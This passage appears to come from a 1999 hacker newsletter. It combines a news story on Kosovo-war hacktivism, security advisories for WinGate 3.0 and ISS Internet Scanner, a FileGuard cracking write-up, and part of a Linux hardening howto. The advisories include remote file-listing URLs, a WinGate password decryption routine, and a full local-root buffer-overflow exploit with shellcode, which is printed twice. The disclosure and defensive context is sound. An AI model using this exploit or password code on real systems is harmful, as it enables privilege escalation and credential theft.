virtual war is being fought in cyberspace. In the past few days, hackers on
both sides of the conflict have been defacing Web sites with electronic
graffiti and launching programs designed to slow down or crash their
opponents' servers.
On Wednesday, the NATO server in Belgium was bombarded with
thousands of e-mail messages from Yugoslav hackers that overloaded its
Web site. Another group, called ''Russian Hackers Union,'' defaced a US
Navy site.
Hacking groups in the United States and Europe are retaliating with their
own graffiti. Team Spl0it, a coalition that includes an 18-year-old American
hacker, broke into several Web sites and posted such antiwar slogans as,
''Tell your governments to stop the war.'' Hackers on the West Coast are
trying to crack the Serb government site, although the server is said be
extremely secure and based in London. And the Kosovo Hackers Group, a
coalition of European and Albanian hackers, has erased at least five sites
and replaced them with black and red ''Free Kosovo'' banners.
In what is being called the first Internet war, hackers are emerging as
electronic vigilantes. At the same time that governments are inundating the
Internet with propaganda and individuals are using the medium to
communicate, hackers have actually taken the battle into their own hands,
performing military exercises with the click of a mouse.
It's called ''hacktivism,'' the marriage of computer hacking and political
activism. This form of protest has been around since 1995, when hackers
became politicized to support convicted hacker Kevin Mitnick. Most
electronic civil disobedience is illegal in the United States, but this is the first
time it has been employed during an international conflict, and there is no
precedent that governs such conduct.
Michael Vatis, chief of the FBI's National Infrastructure Protection Center,
said through a spokesman yesterday that he had no comment on the recent
rage of hacktivism.
In past international conflicts, governments have successfully disrupted the
telecommunications systems of their opponents. But in the age of the
Internet, this is the first time that private citizens have been able to jump into
the fray.
''This is the harbinger of things to come,'' said Barry Steinhardt, former
president of the Electronic Frontier Foundation and associate director of the
American Civil Liberties Union. ''It's a free and open network. Parts of it are
sealed off, but it's a porous network. It's inevitable that you're going to get
vigilantes acting in an extralegal way.''
Hackers have traditionally objected to attempts to curtail free speech, and
American hackers are outraged by Serb government censorship. One
member of Team Spl0it, an 18-year-old resident of the East Coast who
goes by the handle f0bic said in an e-mail message that he and others
decided to take action a few weeks ago. ''I, along with the rest of my team,
decided to get the message out on the Internet,'' he wrote. ''Our message
was bright and clear: Stop the war before we go to World War III.'' The
Globe has confirmed his existence, but he asked that his name not be used.
In the past, the Electronic Frontier Foundation, a leader in Internet policy,
has contended that hacktivism is illegal and can be neither encouraged nor
condoned. But that may change in an international conflict.
''We may want to reevaluate that in light of the historical importance that civil
disobedience has played as a means of protest,'' said Alex Foster, the
foundation's director of public affairs. ''Does hacktivism change in a crisis
situation? I don't have an answer on that yet.''
Foster warned that ordinary citizens who are using the Internet to
communicate their own political opinions legally should be careful, though.
''People in Serbia who are using the Internet for normal things like sending
e-mail may be putting themselves at great risk,'' he said.
But US and Russian hacktivists continue their cyberwar unconcerned about
repercussions. ''We are activists because we see there are wrongs that need
to be corrected,'' f0bic wrote.
This story ran on page A02 of the Boston Globe on 04/03/99.
� Copyright 1999 Globe Newspaper Company.
@HWA
31.0 WinGate 3.0 problems
~~~~~~~~~~~~~~~~~~~~
Date: Mon, 5 Apr 1999 17:52:51 -0700
From: Marc <Marc@EEYE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Multiple WinGate Vulnerabilities[Tad late]
At first we were just going to post this advisory to our website but after
the subject came up on the NTSEC list and we got a few emails telling us to
post it to the other lists... well here it is.
Signed,
Marc
eEye Digital Security Team
http://www.eEye.com
P.S.
Go see Matrix.
________________________________________________________________________
eEye Digital Security Team <e>
www.eEye.com
info@eEye.com
February 22, 1999
________________________________________________________________________
Multiple WinGate Vulnerabilities
Systems Affected
WinGate 3.0
Release Date
February 22, 1999
Advisory Code
AD02221999
________________________________________________________________________
Description:
________________________________________________________________________
WinGate 3.0 has three vulnerabilities. Read any file on the remote system.
1. Read any file on the remote system.
2. DoS the WinGate service.
3. Decrypt WinGate passwords.
________________________________________________________________________
Read any file on the remote system
________________________________________________________________________
We were debating if we should add this to the advisory or not. We
figured it would not hurt so here it is.
The WinGate Log File service in the past has had holes were you can
read any file on the system and the holes still seem to be there and
some new ways of doing it have cropped up.
http://www.server.com:8010/c:/ - NT/Win9x
http://www.server.com:8010// - NT/Win9x
http://www.server.com:8010/..../ - Win9x
Each of the above URLs will list all files on the remote machine.
There are a few reasons why we were not sure if we were going to post
this information.
By default all WinGate services are set so that only 127.0.0.1
can use the service. However the use for the log file service is to let
users remotely view
the logs so therefore chances are people using the log file service
are not going to be leaving it on 127.0.0.1. Also by default in the
WinGate settings "Browse" is enabled. We are not sure if the developers
intended the Browse option to mean the whole hard drive. We would hope
not.
The main reason we did put this in the advisory is the fact that
the average person using WinGate (Cable Modem Users etc..) are not the
brightest of people and they will open the Log Service so that everyone
has access to it. We understand there are papers out there saying not
to do this and even the program it self says not to, but the average
person will not let this register in their head as a bad thing so the
software should at least make it as secure as possible. Letting people
read any file is not living to that standard. Any way, lets move on...
________________________________________________________________________
DoS the WinGate Service
________________________________________________________________________
The Winsock Redirector Service sits on port 2080. When you connect to it
and send 2000 characters and disconnect it will crash all WinGate
services. O Yippee
________________________________________________________________________
Decrypt the WinGate passwords
________________________________________________________________________
The registry keys where WinGate stores its passwords are insecure and
let everyone read them. Therefore anyone can get the passwords and
decrypt them. Code follows.
________________________________________________________________________
// ChrisA@eEye.com
// Mike@eEye.com
#include "stdafx.h"
#include <stdio.h>
#include <string.h>
main(int argc, char *argv[]) {
char i;
for(i = 0; i < strlen(argv[1]); i++)
putchar(argv[1][i]^(char)((i + 1) << 1));
return 0;
}
________________________________________________________________________
You get the idea...
It is good that WinGate 3.0 by default locks down all services to 127.0.0.1.
However, there still seems to be holes were if one gets access to the
WinGate service, non-blocked ip, they can do some damage. Chances
are if you poke hard at some of the other services you will find similar
problems as above. Software developers need to remember that the avg. user
is not all
ways the brightest so our products security must be as tight as possible.
________________________________________________________________________
Vendor Status
________________________________________________________________________
Contacted a month or so ago, have heard nothing. Someone from the NTSEC
list contact eval-support@wingate.net with our findings and they were
sent an email back rather quickly. We had sent our emails to
support@wingate.net and things of the such. Maybe all three of our
emails just got lost. The last we've heard WinGate is taking steps to fix
the problem. Look for patches soon.
________________________________________________________________________
Copyright (c) 1999 eEye Digital Security Team
________________________________________________________________________
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.
________________________________________________________________________
Disclaimer:
________________________________________________________________________
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
http://www.eEye.com
@HWA
32.0 Sekure team releases problems found with ISS-scanner including rewt sploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sekure SDI
http://www.sekure.org
---------------------------
Brazilian Information Security Team
-> Internet Scanner Buffer Overflow <-
(SDI.03-99.iss-scanner)
---
complexity : medium
critical level : medium
---
1. Introduction
Internet Scanner (I.S) is a wide known tool to audit the security level
of a certain network. It has a database which will assist in the detection of
the commom security holes that may help an intruder to gain access or
gather private information from the scanned host.
During the checks, I.S. will run a set of procedures that requires
privileges in the local host (root), so an ordinary user may not start a
scan.
Altough it's not the default configuration, it's commom, in certain
cases, to set the suid bit to permit "root privileges" so the "audit" user,
who does not have the necessary privileges, may execute a scan.
A certain problem was found in the IS program during some tests in
our lab. While by default it will not represent a thread, in the above
situation (suid bit owned by root), it will become a security gap.
2. I.S Flaw
Internet Scan does not check bounds in some arguments it receives from
the command line, which will cause a segmentation fault.
sekure:~$ ./iss -D `perl -e "print 'A' x 2000"`
Creating Directory /usr/local/iss/scans/s.199903241212
# Time Stamp(2103): Signal - Segmentation Violation: (...)
(..)
ISS Scan was interrupted.
Segmentation fault
sekure:~$ ./iss -c `perl -e "print 'A' x 2000"`
(...)
Segmentation fault
Let's check the return address:
(gdb) run -D `perl -e "print 'A' x 2000"`
Starting program: iss -D `perl -e "print 'A' x 2000"`
(...)
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
In this situation, we can reach the return address (which holds the
place the program must return in the memory), so we may execute arbitrary
commands, and adding the "suid bit" situation, it will be executed with root
privileges.
3. Who is vulnerable ?
If you are running I.S using the SETUID bit to conceed root privileges
to an ordinary user, then you ARE vulnerable to this attack.
If you are using the DEFAULT configuration of I.S, you are NOT
vulnerable.
4. Fixing the situation
The ISS which is the owner of I.S does not provide the source code along
with the program, so we may not provide a quick patch.
We advice you to remove the suid bit and contact the vendor for a
correction.
We also advice you to avoid the use of suid bit unless you are familiar
with the purpose of the program.
5. Exploiting the bug
We believe information must be free available. If we don't provide the
exploit script along with the information, someone else will do.
We also know that people like to see with their own eyes to believe
they are vulnerable. So here it is:
------------- SDI-iss.c -----------------------------
/*
* Sekure SDI - http://www.sekure.org
* Brazilian Information Security Team
* By c0nd0r <condor@sekure.org>
*
* . ..Internet Scanner (ISS) Buffer Overflow.. .
* (read the original advisory at http://www.sekure.org/advisory.html)
*
* > This may not represent a thread if you are
* > NOT using IS with setuid root
*
* This code is only for educational purposes.
* ------------------------------
* Instructions: After the compilation, execute it to get
* a shell prompt with the $EGG in the environment.
* tiazinha:~$ SDI-iss
* bash$ ls -tarl iss
* -rwsr-xr-x 1 root daemon 1691180 Dec 10 15:22 iss*
* bash$ ./iss -c $EGG
*
* Creating Directory /usr/local/iss/scans/s.199903261158
* id;
* uid=666(condor) gid=100(deejay) euid=0(root) groups=12(mail)
* -------------------------------
* PS: the i/o descriptors are used by IS (stdin/stdout) as this is
* just an example, I'll not worry about.
*/
char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define ISS_HOME "/usr/local/iss"
main ( int argc, char *argv[]) {
char buff[2048], env[250];
long addr;
int x, y, offset=0, src;
if (argc > 1) offset = atoi(argv[1]);
for ( x = 0; x < (238-strlen(shellcode)); x++)
buff[x] = 0x90;
for ( y = 0; y < strlen(shellcode); y++, x++)
buff[x] = shellcode[y];
addr = (long) &src + offset;
printf ( "SDI I.S. Exploit Code\n");
printf ( "4 educational purpose only\n");
printf ( "Please, go to ISS directory and run:\n");
printf ( "./iss -c $EGG\n\n");
/* the program mess with the stack so I prefer to set it
by my own hands, no prob, just a little bit different */
buff [x++] = 0x60;
buff [x++] = 0xef;
buff [x++] = 0xff;
buff [x++] = 0xbf;
/* it works fine in my slak3.5 box */
buff[strlen(buff)] = '\0';
snprintf ( env, sizeof(env), "ISS_HOME=%s", ISS_HOME);
putenv ( env);
bzero ( &env, sizeof(env));
snprintf ( env, sizeof(env), "EGG=%s", buff);
putenv ( env);
system ( "/bin/sh");
}
--------------------- eof ------------------
6. Contacts
Sekure SDI
http://www.sekure.org
info@sekure.org
This advisory has been written by SSC (Sekure SDI Secure Coding Group)
http://ssc.sekure.org
securecode@sekure.org
Subscribe the Best of Security Brazil - mailing list
http://bos.sekure.org
bos-br-request@sekure.org
(the main language is portuguese but everybody is welcome)
----
written by c0nd0r
condor@sekure.org
-condor
www.sekure.org
s e k u r e
pgp key available at: http://condor.sekure.org/condor.asc
@HWA
The rewt sploit;
/*
* Sekure SDI - http://www.sekure.org
* Brazilian Information Security Team
* By c0nd0r <condor@sekure.org>
*
* . ..Internet Scanner (ISS) Buffer Overflow.. .
* (read the original advisory at http://www.sekure.org/advisory.html)
*
* > This may not represent a thread if you are
* > NOT using IS with setuid root
*
* This code is only for educational purposes.
* ------------------------------
* Instructions: After the compilation, execute it to get
* a shell prompt with the $EGG in the environment.
* tiazinha:~$ SDI-iss
* bash$ ls -tarl iss
* -rwsr-xr-x 1 root daemon 1691180 Dec 10 15:22 iss*
* bash$ ./iss -c $EGG
*
* Creating Directory /usr/local/iss/scans/s.199903261158
* id;
* uid=666(condor) gid=100(deejay) euid=0(root) groups=12(mail)
* -------------------------------
* PS: the i/o descriptors are used by IS (stdin/stdout) as this is
* just an example, I'll not worry about.
*/
char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define ISS_HOME "/usr/local/iss"
main ( int argc, char *argv[]) {
char buff[2048], env[250];
long addr;
int x, y, offset=0, src;
if (argc > 1) offset = atoi(argv[1]);
for ( x = 0; x < (238-strlen(shellcode)); x++)
buff[x] = 0x90;
for ( y = 0; y < strlen(shellcode); y++, x++)
buff[x] = shellcode[y];
addr = (long) &src + offset;
printf ( "SDI I.S. Exploit Code\n");
printf ( "4 educational purpose only\n");
printf ( "Please, go to ISS directory and run:\n");
printf ( "./iss -c $EGG\n\n");
/* the program mess with the stack so I prefer to set it
by my own hands, no prob, just a little bit different */
buff [x++] = 0x60;
buff [x++] = 0xef;
buff [x++] = 0xff;
buff [x++] = 0xbf;
/* it works fine in my slak3.5 box */
buff[strlen(buff)] = '\0';
snprintf ( env, sizeof(env), "ISS_HOME=%s", ISS_HOME);
putenv ( env);
bzero ( &env, sizeof(env));
snprintf ( env, sizeof(env), "EGG=%s", buff);
putenv ( env);
system ( "/bin/sh");
}
@HWA
33.0 FileGuard crack, security vulnerabilities.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
___________________________
/ / / /\
______/ ____/ ____/ / /
/ / / / ____/ /
/ /____ / ____/ / /
/ / / / / / / /
/_/_/_/________/________/________/ /
\_____\________\________\________\/
/ . ../Macintosh Security/.. . /
/________________________________/
Presents:
Security Holes In FileGuard 3.0.8
Table Of Contents:
- Introduction
- Gaining Full Access
- Launching The Cracked FileGuard Application
- Password Protected Volumes
- Disclaimer
- End notes
--==< Introduction >==--
By far FileGuard is the best protection software for the Macintosh OS.
To a start it disables the debugger at operations when an attack could
be expected. So it's pretty difficult to find out what algorithm it
uses to encrypt the passwords. Not impossible but not as easy as in
various other protection software for the Mac.
Lets start with analyzing what FileGuard can do to protect a computer.
Well, the appropriate question is more like, what FileGuard CAN'T do?
It can protect volumes, it can encrypt files, it can password protect
applications, it can limit access to files/ folders, etc... And it
does not have the weaknesses that other security programs have. Such
as "emergency passwords" or the letting the user remove extensions with
use of programs such as FileBuddy. Shift disable works but is useless
if the hard disk is password protected.
--==< Gaining Full Access >==--
So this is nice and all, as long as only the administrator can change
the various access settings. But what happens if the attack comes from
the most unexpected place? The FileGuard application itself. This is
the application that allows the administrator to change the settings to
the various protection facilities. Naturally it's protected. It only
launches if the administrator's password is entered. However this password
protection can easily be cracked. And once it's cracked - meaning that
it'll accept any password as the admin password - then anyone can do the
changes to the settings that an admin could do.
--==< Launching The Cracked FileGuard Application >==--
Launching the cracked application might actually prove to be a problem
depending on how limited the user's access to the computer is. The easiest
way to launch the cracked FileGuard app is through a user account with the
authority to copy and launch applications. Then the FileGuard application
can be copied onto the computer and launched from there. However, a system
is still vulnerable if the user is not allowed to copy applications. If
the user has enough access to launch applications from floppy disks then
the cracked FileGuard app can simply be copied to a disk and launched from
there.
This method can be exploited through the guest account (if the guest account
is enabled). The access to the computer using a guest account might be rather
restricted. For example, floppy disks might not be allowed to be inserted into
the computer. However, users will still be able to insert CDs and if it has a
copy of the cracked FileGuard app on it then can be launched from there.
--==< Password Protected Volumes >==--
I remember how once my computer teacher locked the HD on his computer with
FileGuard and something happened to the password. He spent hours on the net
before he found out some way of bypassing this problem. The only way available
until now was to install a new driver onto the hard drive. Unfortunately this
corrupts the disk.
Highware has designed a program for situations such as this called EmergencyRemove.
EmergencyRemove can be used to remove the drive-protection in emergency situations.
However, even EmergencyRemove requires the appropriate password to be entered in
order for the protection to be removed. And this is where the security hole is;
by cracking EmergencyRemove so that it'll accept any password anyone can remove the
volume protection from any protected disk.
NOTICE: I have not actually tried password protecting my hard disk. So I don't
actually "know" whether this method works on hard drives. I did, however, try this
method on floppy disks and each attempt was successful.
--==< Disclaimer >==--
These security holes are very real and may be exploited for "damaging" purposes.
The objective of this text file was NOT to encourage such behavior but simply to
point out the existing security holes of FileGuard 3.0.8. Therefore, neither mSec
nor any of it's past, current or future members will take any responsibility for any
kind of damage that may occur of any direct or indirect use of the information provided.
--==< End Notes >==--
Two patches have been included with this text file as examples of how FileGuard and
EmergencyRemove can be exploited.
These security holes were found by mSec. If you are interested in finding out more
about mSec please visit our homepage at: www.msec.net. You can also reach us and
chat with the members on our Hotline server at: msec.net.
This text file was put together by ProZaq. If you have any questions or comments my
e-mail address is: prozaq@usa.net
http://www.msec.net/texts/texts/FileGuard_308_Holes.txt
@HWA
34.0 Linux system administration mini-howto by Pestilence
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Release Date : 6th April 1999
Previous Versions: none
Linux Mini Administration HOWTO.
By Kostas Petrakis aka Pestilence.
This was written mostly as a small guide to some NT based co-workers here at
my work so that they could check a few stuff on Linux systems if needed.
Also i decided to write this because there are lots of administration howto's
out there which are also kinda old.
This paper in not a super-detailed paper, for this purpose there are other
papers mentioned in the end of this HOWTO. This paper was intented to give a
small clue of what people should check before they decide to allow services to
run on their systems, or fully connect to the Internet.
More and more people everyday connect their systems to the Internet, and more
people are seriously thinking of buying either a leased line, or a cable modem
and stay 24-7 on-line.
There are allot of systems on-line some of them are tight secured, and
others are openwide yelling to be hacked.
This text is intented to give a small idea of what someoone should check at
his system before he goes on-line, or what to secure once he is on-line.
SERVICES
Many servers over the Internet offer a wide of services to their users and
customers, what comes here is a big risk since time has prooved that allot
of services are usually buggy and easily exploitable providing root access, or
other kinds of access to remote or local users.
An administrator of either a home system, or a company, should be
able to keep on track of this bugs and try to keep his software as more up to
date as he can. This can be done by subscribing to several security mailing
lists, such as Bugtraq, or Cert (Links included in the end of this document).
Another major issue on services are the configurations of each service.
Services usually follow a "guideline" of operation, which is usually declared
in the configuration section of each service. Most buggy services have
prooved to be: sendmail, web servers, ftp servers, and generally all
services that have to do with interaction between the user and the file
system. People oftenly like to bypass the configuration of services, and like
to leave them the way they where installed, without even taking a look at what
configurations are offering, this is a major mistake oftenly found to Junior
administrators, or newcomers to the Unix world.
WEB SERVERS
Web servers keep their configuration files under the directory /etc/httpd/conf
(default installation from the Linux distribution, which we encourage you to
update to the most recent), or to /usr/local/apache/conf if recompiled, and you
leave the paths intact.
Take a good look at the configuration, sometimes you will see it has entrys
you wouldn't want to, the one you should surely check is under what user does
httpd operate, make sure httpd runs under user:nobody and group:nobody. Check
that the log directory is not user writable, you dont want users "playing" with
your log files now do you?.
The biggest security thread though lately with httpd, is it's CGI's.
CGI's are small programs written either in perl, or C, which are used by the
webserver, and are usually the most dangerous.
CGI's if coming from some unknown or not that reliable source should be
checked for possible problems in their code which would risk the security of
your webserver. The security risks a CGI could possibly create are the
following:
1) Expose Information of your Webserver and its local filesystem/ users.
2) Search Scripts are the most dangerous, since a small missconfiguration,
would allow remote users to search your entire filesystem, and reveal high
risk information to them. Even if you dont run your webserver as root, you
still have chances to run in big trouble.
Try not to give access to users (if you allow user webpages, or have
virtualhosts) to their cgi-bin directories, instead let them mail you and ask
you to check a cgi script they want to use, or even better give them a list of
CGI's they can use, that you trust.
Avoid suid privilleged scripts, they are high risk and there is rarely the
need for a script to be under such privilleges.
Try to have scripts that validate the contect submmited by forms, validation
of data is a more secure way to control what is being passed to your system.
Avoid scripts that will allow remote systems to use them (Matt's scripts allow
this feature).
And finally avoid all scripts that have to do with web interfaces on
services...this scripts usually are of super high risk!
More on web security can be found following the links below.
FTP
FTP servers, are another high Risk on systems, generally it would be wise to
avoid the use of FTP if there is no need, or if there is a need you should
avoid having anonymous ftp enabled.
FTP servers are used for file transfers between hosts. More oftenly they are
used to give users of systems access to their websites.
If you are from the persons that love, or like to contribute to the Linux
community either with having a public ftp server offering mirroring services,
or using the ftp server to release your software you should be very carefull,
of what you give, and what you allow remote users to have.
The default ftp daemon that comes with the Linux installation is wu-ftp, this
server is simple, and good, but unfortunately several bugs where discovered,
and it seems updates are not that often to it. So i recommend the use of a
more advanced FTP server, which will allow you to have more detailed
configuration files. One ftp server i like allot and use oftenly is ProFTPd,
this server has an apache like configuration file, and allows the admin to
have full control over it.
Its widely used on major sites such as Linuxberg, Freshmeat, it updates
frequently and they have a very good responce time over bugs found on it.
It's site offers a very good documentation, and the configuration of it is
really easy even from the average users who want to give partial access to
remote users.
It can run as a standalone daemon, or through inetd with the use also of
tcp-wrappers.
For instance lets have a look how ProFTPd is configured to allow remote users
to upload to a directory, but deny them to download from that dir (good to
deny warez usage of your ftp server) and also deny them the creation of
subdirectories.
<Anonymous /home/ftp>
User ftp
Group ftp
UserAlias anonymous ftp
<Directory *>
<Limit WRITE>
DenyAll
</Limit>
</Directory>
<Directory incoming>
<Limit STOR>
AllowAll
</Limit>
<Limit READ>
DenyAll
</Limit>
</Directory>
</Anonymous>
This is what the entry looks like in proftpd.conf, this denies the remote
anonymous users to write to any directory except of incoming, in that
directory anonymous users are allowed to upload files, but they are denyed of
reading the directory, deletetion of files, or the creation of
subdirectories. If you are more paranoid and even if you have limited the usage
of ftp only to valid users but you need more security, you can make use of a
nice firewall, this though requires that most of your ftp users are local
users, and remote users that are allowed usage of the ftp server have static
IP's. To do so, you would setup a firewall allowing access from your subnet,
and the remote users and would DENY everyone else trying to connect to it.
SHADOW PASSWORDS
One of the most important things is the password management. Passwords are
held in the /etc/passwd file (in case you didn't know...). Leaving password
files like that is a high security risk, and even if you don't allow access to
the system to any user, should be more secure.
Password files can be more secure with the usage of shadow, since password
files are user readable you should switch to shadow (i don't understand why
some distributions of Linux don't install by default shadowing), anyway as we
said /etc/passwd is world readable, this means that any user with access to
your system is able to read the password file. The encryption of password
files is really weak, and a simple user with a password cracker would be able
to crack a few passwords in a few minutes. Its highly advisable to all users either with local
boxes or company administrators to switch to shadowing.
To use shadowing on your system you only have to run the pwconv command
usually residing in the /usr/sbin directory. This will create a seperate file
in the /etc dir called shadow, which holds the encrypted passwords, and will
replace the password field in the /etc/passwd file with a "x" e.g
pestilence:x:500:500::/home/pestilence:/bin/bash
This is the entry in passwd after the usage of shadow.
The original password is kept in /etc/shadow which is readble only by root,
thus denying now the local users to "take a look" at your passwords.
For more security, if you use a radius server with the companion of a cisco
router for authentication, it would be wise to deny access to users at your
system, to do this simply change the shell entrys in the passwd file to some
non-existened shell.
POP
POP is used to allow users to retrieve their e-mail remotely. There aren't much
of pop daemons, but its preffered not to use the default that comes with the
installation (ipop3d), i would advise you to use one such as qpopper, which
runs through inetd and can be used with TCP Wrappers.
POP is a service that usually is wide open, this means that users that have
accounts on your system, but use also on some other ISP can connect to your
system and retrieve their mail.
Usually it's left like that, but if you are really paranoid you can block all
remote systems and allow only local users to connect and retrieve their mail.
Just 1 thing must be sure, don't install a pop daemon that doesn't get the
needed support by it's authors, or doesn't produce some kind of detailed logs
(such as failed password entry attempts, or connections).
SENDMAIL
Here things get a bit more complicated, sendmail is the daemon used to send
and receive e-mails between hosts.
Sendmail uses several configuration files, with its main config file being
sendmail.cf.
Through this file you declare the files to be used for various purposes, such
as the list with the allowed domains to use sendmail (ip-allow, name-allow),
and the relay list, which contains the domains of virtualhosts you host.
Lets take a closer look to sendmail.
Unfortunately sendmail is propably one of the most buggy services on the
Internet, up to now nearly all versions of it have either a remote, or local
exploitation.
Because of this problems you should be really carefull with sendmail, a small
missconfiguration might cause you a big headache later.
The main files you should be carefull with are:
ip-allow --> here you enter all the IP's you want to allow to use your
sendmail...don't leave it blank, otherwise you will have the whole Internet
using your sendmail to mail.
name-allow --> same as above but here you enter the hostnames of the systems
(usually used when VirtualHosting is being done on your systems).
relay --> This file contains the host to wich we allow relaying...this also
shouldn't be left empty.
sendmail.cw --> this file holds all the aliases for your system, this is again
used if you host several virtual domains.
Don't forget to oftenly upgrade your sendmail...yes i know this is kinda like
a small pain in the ass, but it's also your only way to prevent the damage
that a newly discovered bug can produce.
DNS
DNS is the service used to resolve the ip address of a host to a valid
hostname.
All big networks with their own domain use DNS, DNS has been subject to heavy
remote exploitations in the past, and also is a service than can be used to
give away allot of usefull info to intruders (such as your network systems,
intruders combining the BIND version can sometimes guess the remote O/S and
it's version). It's high advisable to move to BIND 4.9.7 or the 8.X series, if
you are still running a 4.9.6 series of it, then you are vulnerable to a
remote root exploitation.
Make sure you have configured DNS properly, otherwise you might experience
problems. Also the use of a firewall (for the interactivy between the primary
and the secondary nameserver) would be highly recommended.
LOGGING
One of the most important aspects of system administration, is extensive
logging, and also constant monitoring of the systems.
Linux logs use various loggers, all of the logs are kept under /var/log.
Let's take a better look at the loggers of Linux:
messages --> here the system ouputs various kernel, and service messages with
the use of sysklogd
secure --> here the system logs connection attempts to various ports from
local, or remote hosts.
mailog --> The sendmail daemon logs nearly everything here.
xferlog --> the ftp daemon outputs its messages here.
wtmp --> When a user logs, or the system reboots this file changes, it's a
binary file and you can't "cat" it or "tail" it, to get access to it you use
the "last" command. This command outputs formated the data kept in wtmp.
System logs allthough are kept under root privilleges doesn't mean once hacked
they cant be modified, there are various tools in the trade which allow users
to erase specific strings from them and thus hide their appearance on your
systems. A way to make it more difficult to erase their presence from the logs
(allthough this doesn't mean they cant still erase), is to use remote logs,
sysklogd has a feature, which allows system admins to log also on remote
systems. I would reccomend this method, since it allows you to have a seperate
log file on a remote system, and since the hacking scene has allot of newbies
they nearly never check for remote logs.
Allthough the logging facility of Unix systems is good, its not designed to
heavy log. To have a better chances of detecting suspicious moves, i recommend
log daemons for this specific task...detect and log, such loggers are iplog
(which i widely use on my systems). Iplog is a set of 3 log daemons:
tcplog --> logs and detects all tcp connections, it's also able to detect and
log, scans using nmap.
udplog --> logs all udp traffic
icmplog --> logs all icmp traffic
Always try to enable seperate logs for all your daemons (e.g qpopper -->
/var/log/pop), this makes the monitoring process more easy.
Get logcheck,this program will scan your regular logs for security
violations, Unusuall system events, etc.
Try to monitor regulary your systems logs...don't let them pass by, before the
storm there are always some drops of rain...so you might be lucky and stop the
intruders before they gain access. Make some shell script for your logs, and
make them scan your logs for specified strings, enable their usage with the
cron daemon, and make them check the logs in small period of time, so you can
have a nice organized report in small time periods, without confusing your
head in the (usually) huge system logs.
XWINDOWS
Xwindows is another security headache.
Unfortunately Xwindows are allot of risk, so i would advise if you use a
system as a server, not to use Xwindows, as you risk your security with their
usage.
If though you need to make use of them, make sure to setup some security, use
some firewall, and don't forget of the "xhost -" command which will disable
remote access to your X facility.
TELNET
If there isn't a real necesity of it, disable it. Allthough telnet by itself
isn't that much of a security risk, it can be usefull to future intruders to
work their way in e easily. If you need telnet, try to setup a firewall to
restrict access to it.
A simple move also to the total newbies would be to change you /etc/issue.net
file, issue.net usually contains the type of O/S you run, and it's used as a
banner to telnet connections. Allthough there are toold in the trade to detect
what a remote systems O/S is (nmap, quesso), there are also plenty of windows
hacker wannabes which usually will just telnet to check what O/S your
running...deny (even if it's really easy to determine the remote O/S) them
knowledge on your system.
KERNEL OPTIONS
On the 2.2.x series of kernels there are a few interesting options using
booleans under your /proc/sys/net/ipv4 folder, this are icmp_echo_ignore_all,
icmp_echo_ignore_broadcasts .etc, this files are used to specify some
networking "reactions" of your system...it is advised (not necessary though)
to:
echo 1 >
those files, this will prevent ping replys to ping requests, and also will
help you avoid smurf attacks over your network.
tcp_syncookies is also advised to be echoed to 1, if your system is a widely
used server.
While compiling the 2.2.x kernel don't forget to include as many networking
options as you can, such as routing messages, firewall support, etc.
This will help you setup a more effectively working network.
SNIFFERS
Allthough sniffers aren't necessary to run all the time, it's wise to use them
time to time.
Network sniffers catch and display the datagrams moving around your network,
it's usually a helpfull way to detect problems in your network.
Latest kernels have also the abillity to detect if some device has entered
promiscous mode (sniffer activated on some device). Make sure simple users dont
have access to the sniffer, otherwise you will have big time troubles (since
usually most services use plain text passwords).
There is a big collection of good sniffers, so i wont discuss any of them...i
usually fire up X and run Ethereal if there is a big need to do so.
AUDITING TOOLS
This tools are widely used by hackers to scan networks for known problems...so
if hackers use them, you should also use them.
Nessus is at the moment the best tool for such a task, its nearly
updated everyday and currently it supports 209 security checks.
Always run a scan on your network, check if you missed something, don't allow
intruders gain advantage of something you forgot.
This tools should be used very often on ALL your systems.
TEMPORARY SYSTEMS
Allot of times before i install a server, i temporary connect it to the
network so i can ftp and fetch all the needed files.
Since this systems are getting ready to either replace an existing server, or
be a part of the network as new a server, you should be very carefull.
Intruders dont always scan a single system, they might scan a whole subnet to
get information on every system you have running on your network. So even if
that system is a temporary one, don't bypass it's configuration, configure it
to be as secure as it can be, and try to deny every kind of connection to it
(use a firewall or something).
## /etc/inetd.conf ##
Through this file some of the systems services are handled. The default file
has many useless and unwanted services open. You should modify this file
immediately after you install your system.
Close nearly all ports, and leave open only those you need, echo, time, date
and such ports are rarely used, and are not needed by any programs, so make
sure you disable them.
Services in inetd.conf have the abillity to work with tcp_wrappers. We are
going to explain tcp_wrappers in the next section.
TCP WRAPPERS
Tcp Wrappers are files that are used to restrict access to your system(
allthough i prefer using a firewall for this kind of work). If you are new to
the firewall world, and need really quickly to restrict access to some
services use them, but then go and read the firewall HOWTO :).
The best way would be to use both a firewall and tcp wrappers.
Tcp wrappers use the files: /etc/hosts.allow and /etc/hosts.deny, hosts.allow
holds all the ip addresses of the systems or subnets you want to allow access
to services, and hosts.deny include hosts that are denyed to access services.
WARNING: Not all services use tcp wrappers, for instance sendmail is now a
stand alone daemon, so tcp wrappers wont work with it, make sure you see if a
